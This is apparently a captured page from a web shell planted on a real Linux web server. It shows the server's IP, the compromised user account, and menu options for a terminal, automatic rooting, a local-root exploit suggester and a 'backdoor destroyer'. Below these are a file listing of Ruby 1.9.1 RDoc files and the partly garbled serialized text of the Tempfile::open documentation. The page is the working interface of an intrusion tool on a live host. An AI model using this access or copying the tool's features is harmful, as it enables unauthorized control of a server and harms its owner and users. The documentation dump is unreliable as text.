Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby19 /
share /
ri /
1.9.1 /
system /
Tempfile /
Delete
Unzip
Name
Size
Permission
Date
Action
Remover
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
cdesc-Tempfile.ri
3.63
KB
-rw-r--r--
2023-07-26 17:26
close%21-i.ri
282
B
-rw-r--r--
2023-07-26 17:26
close-i.ri
543
B
-rw-r--r--
2023-07-26 17:26
delete-i.ri
148
B
-rw-r--r--
2023-07-26 17:26
length-i.ri
148
B
-rw-r--r--
2023-07-26 17:26
new-c.ri
2.29
KB
-rw-r--r--
2023-07-26 17:26
open-c.ri
974
B
-rw-r--r--
2023-07-26 17:26
open-i.ri
223
B
-rw-r--r--
2023-07-26 17:26
path-i.ri
282
B
-rw-r--r--
2023-07-26 17:26
size-i.ri
326
B
-rw-r--r--
2023-07-26 17:26
unlink-i.ri
1.64
KB
-rw-r--r--
2023-07-26 17:26
Save
Rename
U:RDoc::AnyMethod[iI" open:EFI"Tempfile::open;FT:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"Creates a new Tempfile.;To:RDoc::Markup::BlankLine o; ; [I">If no block is given, this is a synonym for Tempfile.new.;T@o; ; [ I"EIf a block is given, then a Tempfile object will be constructed,;TI"Dand the block is run with said object as argument. The Tempfile;TI"Coject will be automatically closed after the block terminates.;TI"-The call returns the value of the block.;T@o; ; [I"IIn any case, all arguments (+*args+) will be passed to Tempfile.new.;T@o:RDoc::Markup::Verbatim; [I"/Tempfile.open('foo', '/home/temp') do |f| ;FI"$ ... do something with f ... ;FI" end ;FI" ;FI"# Equivalent: ;FI",f = Tempfile.open('foo', '/home/temp') ;FI"begin ;FI"$ ... do something with f ... ;FI"ensure ;FI" f.close ;FI"end;F: @file00I" tempfile;T[ I"(*args);TI"lib/tempfile.rb;T